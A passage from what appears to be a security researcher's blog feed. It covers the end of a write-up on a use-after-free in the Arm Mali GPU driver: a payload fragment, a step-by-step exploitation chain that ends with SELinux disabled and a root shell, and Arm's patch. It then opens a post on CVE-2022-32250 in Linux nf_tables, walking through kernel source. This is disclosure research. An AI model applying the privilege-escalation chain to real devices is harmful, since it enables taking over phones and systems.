<span class="err">//</span> <span class="nf">Restore</span> <span class="nv">stack</span>
<span class="nl">ldp</span> <span class="nb">x29</span><span class="err">,</span> <span class="nv">x30</span><span class="o">,</span> <span class="o">[</span><span class="nv">sp</span><span class="o">],</span> <span class="mi">16</span>
<span class="nl">mov</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">xzr</span>
<span class="nl">ret</span>
</code></pre></div></div>

<p>This is then triggered by opening <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/watchdog</code> and reading from it. After this,
all that remains is to spawn a shell as root.</p>
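
<p>The <code class="language-plaintext highlighter-rouge">adrp</code>/<code class="language-plaintext highlighter-rouge">add</code> pairs in the payload split a target address into a page part and an in-page offset. Since <code class="language-plaintext highlighter-rouge">adrp</code> is PC-relative, the page part is a distance from the page of the instruction itself. The sketch below shows that arithmetic, assuming 4 KiB pages; the function names are hypothetical.</p>

```c
#include <stdint.h>

#define PAGE_SHIFT_4K 12 /* assumption: 4 KiB pages */

/* Signed distance, in pages, that `adrp` needs to reach the page of
 * `target` from an instruction located at `pc`. */
static int64_t adrp_page_delta(uint64_t pc, uint64_t target)
{
	return (int64_t)(target >> PAGE_SHIFT_4K) - (int64_t)(pc >> PAGE_SHIFT_4K);
}

/* Low 12 bits of `target`: the immediate supplied by the following `add`. */
static uint32_t add_page_offset(uint64_t target)
{
	return (uint32_t)(target & 0xFFFu);
}
```

<p>Because the page distance depends on where the payload is placed, it has to be computed against the address of the overwritten function rather than fixed ahead of time.</p>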

<p>The full exploit in summary is:</p>

<ol>
  <li>Perform the routine setup steps for a new <code class="language-plaintext highlighter-rouge">kbase_context</code> (ioctls for version check, setting
flags).</li>
  <li>Initialize the JIT configurations for the <code class="language-plaintext highlighter-rouge">kbase_context</code> using
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to allocate a new region by submitting a command to a kcpu
queue.</li>
  <li>Make the region inactive using <code class="language-plaintext highlighter-rouge">kbase_jit_free</code>.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to reuse the same region by specifying the same <code class="language-plaintext highlighter-rouge">usage_id</code>,
and set a lower value for <code class="language-plaintext highlighter-rouge">initial_commit</code> for the region.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_REGISTER</code>
ioctl) to register a queue using the JIT region’s GPU address.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_csf_queue_terminate</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_TERMINATE</code> ioctl)
to terminate the queue and remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the JIT
region.</li>
  <li>Create an alias to the JIT region using <code class="language-plaintext highlighter-rouge">mem_alias</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALIAS</code>
ioctl) such that the alias region’s GPU VA pages are mapped to the backing physical
pages of the JIT region.</li>
  <li>Allocate and <code class="language-plaintext highlighter-rouge">mmap</code> 16384 pages with a single <code class="language-plaintext highlighter-rouge">mem_alloc</code> operation, followed by <code class="language-plaintext highlighter-rouge">munmap</code>,
to fill up the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> so that subsequently freed pages are
returned to the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> to shrink the JIT region’s backing pages through
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. The freed pages will be spliced onto the start of the page list in the
<code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> and the alias region still contains valid page table entries to
the freed physical pages. The pages are now in a UAF state.</li>
  <li>Allocate a memory region for performing arbitrary writes (i.e. the controlled region).</li>
  <li>Set up a CSF command stream queue by allocating memory for the ring buffer,
registering the queue, creating a queue group and binding the queue to the group. Next,
set up the hardware doorbell page, user input page and user output page.</li>
  <li>[ Command submission ] Overwrite the level 3 PGD entry of the controlled region with an ATE encoding the
physical page containing <code class="language-plaintext highlighter-rouge">avc_denied</code>, by writing to the alias
region. Subsequently, write to the offset of <code class="language-plaintext highlighter-rouge">avc_denied</code> within its page in the controlled
region to overwrite the function with instructions that disable SELinux.</li>
  <li>Open <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/hostname</code> to trigger <code class="language-plaintext highlighter-rouge">avc_denied</code> to disable SELinux.</li>
  <li>[ Command submission ] Overwrite the level 3 PGD entry of the controlled region with an ATE encoding the
physical page containing <code class="language-plaintext highlighter-rouge">proc_watchdog</code>, by writing to the alias
region. Subsequently, write to the offset of <code class="language-plaintext highlighter-rouge">proc_watchdog</code> within its page in the
controlled region to overwrite the function with instructions that call <code class="language-plaintext highlighter-rouge">commit_creds</code>.</li>
  <li>Open <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/watchdog</code> to elevate our credentials.</li>
  <li>Spawn the root shell.</li>
</ol>

<h1 id="patch">Patch</h1>

<p>Arm released a patch for the bug in the <code class="language-plaintext highlighter-rouge">r41p0</code> version of the Mali kernel drivers.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">---</span> <span class="n">a</span><span class="o">/</span><span class="n">mali_kbase</span><span class="o">/</span><span class="n">csf</span><span class="o">/</span><span class="n">mali_kbase_csf</span><span class="p">.</span><span class="n">c</span>
<span class="o">+++</span> <span class="n">b</span><span class="o">/</span><span class="n">mali_kbase</span><span class="o">/</span><span class="n">csf</span><span class="o">/</span><span class="n">mali_kbase_csf</span><span class="p">.</span><span class="n">c</span>
<span class="err">@@</span> <span class="o">-</span><span class="mi">506</span><span class="p">,</span><span class="mi">7</span> <span class="o">+</span><span class="mi">517</span><span class="p">,</span><span class="mi">8</span> <span class="err">@@</span>
 	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span>
 								    <span class="n">queue_addr</span><span class="p">);</span>
 
<span class="o">-</span>	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>
<span class="o">+</span>	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">)</span> <span class="o">||</span> <span class="n">kbase_is_region_shrinkable</span><span class="p">(</span><span class="n">region</span><span class="p">)</span> <span class="o">||</span>
<span class="o">+</span>	    <span class="n">region</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">type</span> <span class="o">!=</span> <span class="n">KBASE_MEM_TYPE_NATIVE</span><span class="p">)</span> <span class="p">{</span>
 		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
 		<span class="k">goto</span> <span class="n">out_unlock_vm</span><span class="p">;</span>
 	<span class="p">}</span>
</code></pre></div></div>

<p>The check in <code class="language-plaintext highlighter-rouge">kbase_is_region_shrinkable</code> prevents using active JIT regions as ring buffers for a CSF command stream queue, which fixes the root cause.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * kbase_is_region_shrinkable - Check if a region is "shrinkable".
 * A shrinkable regions is a region for which its backing pages (reg-&gt;gpu_alloc-&gt;pages)
 * can be freed at any point, even though the kbase_va_region structure itself
 * may have been refcounted.
 * Regions that aren't on a shrinker, but could be shrunk at any point in future
 * without warning are still considered "shrinkable" (e.g. Active JIT allocs)
 *
 * @reg: Pointer to region
 *
 * Return: true if the region is "shrinkable", false if not.
 */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="n">bool</span> <span class="nf">kbase_is_region_shrinkable</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_DONT_NEED</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_ACTIVE_JIT_ALLOC</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
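
<p>The effect of the patched condition can be illustrated with a small stand-alone model. Everything prefixed with <code class="language-plaintext highlighter-rouge">model_</code> or <code class="language-plaintext highlighter-rouge">MODEL_</code> is hypothetical: the flag bit positions are placeholders rather than the driver’s real values, and the free-region test is only a stand-in for <code class="language-plaintext highlighter-rouge">kbase_is_region_invalid_or_free</code>.</p>

```c
#include <stdbool.h>
#include <stddef.h>

/* Placeholder bit positions; the real values live in the driver headers. */
#define MODEL_REG_DONT_NEED         (1UL << 0)
#define MODEL_REG_ACTIVE_JIT_ALLOC  (1UL << 1)
#define MODEL_REG_FREE              (1UL << 2)

enum model_mem_type { MODEL_MEM_TYPE_NATIVE, MODEL_MEM_TYPE_OTHER };

struct model_region {
	unsigned long flags;
	enum model_mem_type type;
};

/* Same shape as kbase_is_region_shrinkable(), on the model flags. */
static bool model_is_shrinkable(const struct model_region *reg)
{
	return (reg->flags & MODEL_REG_DONT_NEED) ||
	       (reg->flags & MODEL_REG_ACTIVE_JIT_ALLOC);
}

/* Mirrors the patched check: true if the region may back a queue's ring buffer. */
static bool model_region_ok_for_queue(const struct model_region *reg)
{
	if (reg == NULL || (reg->flags & MODEL_REG_FREE))
		return false; /* stand-in for the invalid-or-free test */
	if (model_is_shrinkable(reg))
		return false; /* new: active JIT and DONT_NEED regions are rejected */
	return reg->type == MODEL_MEM_TYPE_NATIVE; /* new: native memory only */
}
```

<p>In this model, a region carrying the active JIT flag is rejected at queue registration, which is the step the exploit relied on.</p>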

<p>The <a href="https://android.googlesource.com/kernel/google-modules/gpu/+/422aa1fad7e63f16000ffb9303e816b54ef3d8ca">commit</a> for the patch shows that variants of the bug are fixed in two code paths that don’t properly handle the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag, namely the CSF queue component and the CSF tiler heap component.</p>

<h1 id="resources">Resources</h1>

<ul>
  <li><a href="https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/">https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/</a></li>
  <li><a href="https://gitlab.com/panfork/">https://gitlab.com/panfork/</a></li>
  <li><a href="https://gitlab.freedesktop.org/mesa/mesa/-/tree/main/src/panfrost">https://gitlab.freedesktop.org/mesa/mesa/-/tree/main/src/panfrost</a></li>
  <li><a href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">https://www.kernel.org/doc/gorman/html/understand/understand006.html</a></li>
  <li><a href="https://www.arm.com/products/silicon-ip-multimedia/gpu/mali-g710">https://www.arm.com/products/silicon-ip-multimedia/gpu/mali-g710</a></li>
  <li><a href="https://www.anandtech.com/show/16694/arm-announces-new-malig710-g610-g510-g310-mobile-gpu-families">https://www.anandtech.com/show/16694/arm-announces-new-malig710-g610-g510-g310-mobile-gpu-families</a></li>
  <li><a href="https://www.collabora.com/news-and-blog/news-and-events/reverse-engineering-the-mali-g78.html">https://www.collabora.com/news-and-blog/news-and-events/reverse-engineering-the-mali-g78.html</a></li>
  <li><a href="https://project-zero.issues.chromium.org/issues/42451508">https://project-zero.issues.chromium.org/issues/42451508</a></li>
</ul>]]></content><author><name>kyeojy</name></author><category term="security" /><category term="exploitation" /><category term="arm-mali" /><category term="gpu" /><category term="kernel" /><category term="android" /><category term="use-after-free" /><category term="pixel" /><summary type="html"><![CDATA[This post documents a Use-After-Free (UAF) issue in the Arm Mali GPU kernel driver that I discovered sometime in Oct-Nov 2022.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://kyeojy.github.io/assets/og-image.png" /><media:content medium="image" url="https://kyeojy.github.io/assets/og-image.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">A Netfilter hole</title><link href="https://kyeojy.github.io/posts/a-netfilter-hole/" rel="alternate" type="text/html" title="A Netfilter hole" /><published>2026-05-22T09:27:00+00:00</published><updated>2026-05-22T09:27:00+00:00</updated><id>https://kyeojy.github.io/posts/a-netfilter-hole</id><content type="html" xml:base="https://kyeojy.github.io/posts/a-netfilter-hole/"><![CDATA[<p>This post explores the root cause and exploitation of <code class="language-plaintext highlighter-rouge">CVE-2022-32250</code>, a vulnerability I exploited for a successful demonstration at Pwn2Own Vancouver 2022, and also the first vulnerability I discovered. The issue was used to achieve local privilege escalation on <code class="language-plaintext highlighter-rouge">Ubuntu 22.04 kernel 5.15.0-30-release</code>.</p>

<p>It turns out that around the time of the competition, there was a separate disclosure from NCC Group to the kernel maintainer for the same issue, and ultimately they were given credit for <code class="language-plaintext highlighter-rouge">CVE-2022-32250</code> as they were considered the first ones to report it. Some time after, there were multiple write-ups published on exploitation of the vulnerability (e.g. <a href="https://www.nccgroup.com/research/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/">here</a> and <a href="https://theori.io/blog/linux-kernel-exploit-cve-2022-32250-with-mqueue">here</a>), and this post will offer a different method of exploitation, using only objects from netfilter modules.</p>

<h1 id="netlink-batch-processing">Netlink batch processing</h1>
<p>The vulnerability is a use-after-free (UAF). To understand the conditions that lead to it, it helps to first look at how netlink processes batches of messages, and how the creation and deletion of objects are handled. When interacting with the <code class="language-plaintext highlighter-rouge">nf_tables</code> API, we can send multiple batches, each consisting of a number of netlink messages. Once in the kernel, these messages eventually reach the function <code class="language-plaintext highlighter-rouge">nfnetlink_rcv_batch</code>, which processes the batch one message at a time. The function first retrieves the <code class="language-plaintext highlighter-rouge">nfnetlink_subsystem</code> responsible for the batch, then looks up the callback handler for each message in the batch. If the entire batch is processed successfully, <code class="language-plaintext highlighter-rouge">ss-&gt;commit(...) [1]</code> is called, which is a function pointer to <code class="language-plaintext highlighter-rouge">nf_tables_commit</code>. If a message fails, the function sets the <code class="language-plaintext highlighter-rouge">NFNL_BATCH_FAILURE</code> flag in the status and carries on with the remaining messages. Once the batch has been processed, it then calls <code class="language-plaintext highlighter-rouge">ss-&gt;abort(...) [2]</code> instead of <code class="language-plaintext highlighter-rouge">ss-&gt;commit(...)</code>, which is a function pointer to <code class="language-plaintext highlighter-rouge">nf_tables_abort</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">nfnetlink_rcv_batch</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">nlh</span><span class="p">,</span>
                                <span class="n">u16</span> <span class="n">subsys_id</span><span class="p">,</span> <span class="n">u32</span> <span class="n">genid</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="n">ss</span> <span class="o">=</span> <span class="n">nfnl_dereference_protected</span><span class="p">(</span><span class="n">subsys_id</span><span class="p">);</span>
    <span class="p">...</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">&gt;=</span> <span class="n">nlmsg_total_size</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> <span class="p">{</span>
        <span class="kt">int</span> <span class="n">msglen</span><span class="p">,</span> <span class="n">type</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="n">nc</span> <span class="o">=</span> <span class="n">nfnetlink_find_client</span><span class="p">(</span><span class="n">type</span><span class="p">,</span> <span class="n">ss</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nc</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">ack</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">nc</span><span class="o">-&gt;</span><span class="n">call</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">**</span><span class="p">)</span><span class="n">cda</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_flags</span> <span class="o">&amp;</span> <span class="n">NLM_F_ACK</span> <span class="o">||</span> <span class="n">err</span><span class="p">)</span> <span class="p">{</span>
                <span class="cm">/* Errors are delivered once the full batch has been
                    * processed, this avoids that the same error is
                    * reported several times when replaying the batch.
                    */</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">nfnl_err_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">err_list</span><span class="p">,</span> <span class="n">nlh</span><span class="p">,</span> <span class="n">err</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">extack</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
                        <span class="cm">/* We failed to enqueue an error, reset the
                            * list of errors and send OOM to userspace
                            * pointing to the batch header.
                            */</span>
                        <span class="n">nfnl_err_reset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">err_list</span><span class="p">);</span>
                        <span class="n">netlink_ack</span><span class="p">(</span><span class="n">oskb</span><span class="p">,</span> <span class="n">nlmsg_hdr</span><span class="p">(</span><span class="n">oskb</span><span class="p">),</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">,</span>
                                    <span class="nb">NULL</span><span class="p">);</span>
                        <span class="n">status</span> <span class="o">|=</span> <span class="n">NFNL_BATCH_FAILURE</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="cm">/* We don't stop processing the batch on errors, thus,
                    * userspace gets all the errors that the batch
                    * triggers.
                    */</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span>
                        <span class="n">status</span> <span class="o">|=</span> <span class="n">NFNL_BATCH_FAILURE</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
    <span class="p">}</span>
<span class="nl">done:</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">status</span> <span class="o">&amp;</span> <span class="n">NFNL_BATCH_REPLAY</span><span class="p">)</span> <span class="p">{</span>
            <span class="p">...</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">status</span> <span class="o">==</span> <span class="n">NFNL_BATCH_DONE</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">err</span> <span class="o">=</span> <span class="n">ss</span><span class="o">-&gt;</span><span class="n">commit</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">oskb</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="o">-</span><span class="n">EAGAIN</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">status</span> <span class="o">|=</span> <span class="n">NFNL_BATCH_REPLAY</span><span class="p">;</span>
                    <span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
            <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">ss</span><span class="o">-&gt;</span><span class="n">abort</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">oskb</span><span class="p">,</span> <span class="n">NFNL_ABORT_NONE</span><span class="p">);</span>
                    <span class="n">netlink_ack</span><span class="p">(</span><span class="n">oskb</span><span class="p">,</span> <span class="n">nlmsg_hdr</span><span class="p">(</span><span class="n">oskb</span><span class="p">),</span> <span class="n">err</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
            <span class="p">}</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">enum</span> <span class="n">nfnl_abort_action</span> <span class="n">abort_action</span><span class="p">;</span>

            <span class="k">if</span> <span class="p">(</span><span class="n">status</span> <span class="o">&amp;</span> <span class="n">NFNL_BATCH_FAILURE</span><span class="p">)</span>
                    <span class="n">abort_action</span> <span class="o">=</span> <span class="n">NFNL_ABORT_NONE</span><span class="p">;</span>
            <span class="k">else</span>
                    <span class="n">abort_action</span> <span class="o">=</span> <span class="n">NFNL_ABORT_VALIDATE</span><span class="p">;</span>

            <span class="n">err</span> <span class="o">=</span> <span class="n">ss</span><span class="o">-&gt;</span><span class="n">abort</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">oskb</span><span class="p">,</span> <span class="n">abort_action</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
            <span class="p">...</span>
    <span class="p">}</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
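
<p>The commit-or-abort decision above can be modelled in a few lines of userspace C. This is a minimal sketch, not kernel code: <code class="language-plaintext highlighter-rouge">process_batch</code>, <code class="language-plaintext highlighter-rouge">demo_handler</code>, <code class="language-plaintext highlighter-rouge">struct batch_result</code> and the <code class="language-plaintext highlighter-rouge">BATCH_*</code> values are hypothetical names made up for illustration. It only aims to show that a failing message does not stop the loop, and that a single failure is enough to route the whole batch to the abort path.</p>

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical status bits. They play the roles of NFNL_BATCH_FAILURE and
 * NFNL_BATCH_DONE, but the values here are illustrative only. */
enum { BATCH_FAILURE = 1 << 0, BATCH_DONE = 1 << 1 };

enum batch_outcome { OUTCOME_COMMIT, OUTCOME_ABORT };

struct batch_result {
    enum batch_outcome outcome;
    size_t processed; /* messages handed to the handler */
    size_t errors;    /* messages whose handler returned non-zero */
};

/* A handler returns 0 on success or a negative errno value. */
typedef int (*msg_handler)(int payload);

/* Toy handler (an assumption of this sketch): rejects negative payloads. */
int demo_handler(int payload)
{
    return payload < 0 ? -EINVAL : 0;
}

struct batch_result process_batch(const int *msgs, size_t n, msg_handler handler)
{
    struct batch_result res = { OUTCOME_ABORT, 0, 0 };
    unsigned int status = 0;

    assert(handler != NULL);

    for (size_t i = 0; i < n; i++) {
        int err = handler(msgs[i]);

        res.processed++;
        if (err) {
            /* Record the failure but keep going, so that every error
             * in the batch is observed. */
            res.errors++;
            status |= BATCH_FAILURE;
        }
    }
    status |= BATCH_DONE; /* end of batch reached */

    /* Commit only when DONE is the sole bit set; any failure aborts. */
    if (status == BATCH_DONE)
        res.outcome = OUTCOME_COMMIT;
    return res;
}
```

<p>With the payloads <code class="language-plaintext highlighter-rouge">{1, -1, 3, -2}</code>, all four messages are still handed to the handler, two errors are recorded, and the outcome is an abort.</p>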

<p>The callback handlers that actually process each message in the batch are various <code class="language-plaintext highlighter-rouge">nf_tables</code> functions, registered in a table indexed by message type. Some examples are shown below.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_callback</span> <span class="n">nf_tables_cb</span><span class="p">[</span><span class="n">NFT_MSG_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">...</span>
        <span class="p">[</span><span class="n">NFT_MSG_NEWSETELEM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_newsetelem</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_SET_ELEM_LIST_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_set_elem_list_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_GETSETELEM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_getsetelem</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_RCU</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_SET_ELEM_LIST_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_set_elem_list_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_DELSETELEM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_delsetelem</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_SET_ELEM_LIST_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_set_elem_list_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_NEWOBJ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_newobj</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_OBJ_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_obj_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_GETOBJ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_getobj</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_RCU</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_OBJ_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_obj_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_DELOBJ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_delobj</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_OBJ_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_obj_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">...</span>
<span class="p">};</span>
</code></pre></div></div>
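
<p>The table-driven dispatch can be sketched in plain C as follows. The message types, handlers and the <code class="language-plaintext highlighter-rouge">find_callback</code>/<code class="language-plaintext highlighter-rouge">dispatch</code> helpers are hypothetical stand-ins chosen for this example, and the lookup is deliberately simpler than the kernel's; the point is only how designated initializers give a sparse table in which an unknown type resolves to no handler and therefore to <code class="language-plaintext highlighter-rouge">-EINVAL</code>.</p>

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical message types, standing in for the NFT_MSG_* constants. */
enum msg_type { MSG_NEWOBJ, MSG_GETOBJ, MSG_DELOBJ, MSG_RESERVED, MSG_MAX };

struct callback {
    int (*call)(int arg);
};

/* Toy handlers: each returns a distinct value so calls can be told apart. */
int handle_newobj(int arg) { return arg + 100; }
int handle_getobj(int arg) { return arg + 200; }
int handle_delobj(int arg) { return arg + 300; }

/* Designated initializers: slots that are not listed (MSG_RESERVED) are
 * zero-initialized, so their .call pointer is NULL. */
const struct callback callbacks[MSG_MAX] = {
    [MSG_NEWOBJ] = { .call = handle_newobj },
    [MSG_GETOBJ] = { .call = handle_getobj },
    [MSG_DELOBJ] = { .call = handle_delobj },
};

/* Returns the table entry for a type, or NULL when the type is out of
 * range or has no handler registered. */
const struct callback *find_callback(unsigned int type)
{
    if (type >= MSG_MAX || callbacks[type].call == NULL)
        return NULL;
    return &callbacks[type];
}

int dispatch(unsigned int type, int arg)
{
    const struct callback *cb = find_callback(type);

    if (!cb)
        return -EINVAL;
    assert(cb->call != NULL); /* guaranteed by find_callback */
    return cb->call(arg);
}
```

<p>Here <code class="language-plaintext highlighter-rouge">dispatch(MSG_NEWOBJ, 1)</code> reaches <code class="language-plaintext highlighter-rouge">handle_newobj</code>, while <code class="language-plaintext highlighter-rouge">dispatch(MSG_RESERVED, 1)</code> and <code class="language-plaintext highlighter-rouge">dispatch(MSG_MAX, 1)</code> both return <code class="language-plaintext highlighter-rouge">-EINVAL</code>.</p>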

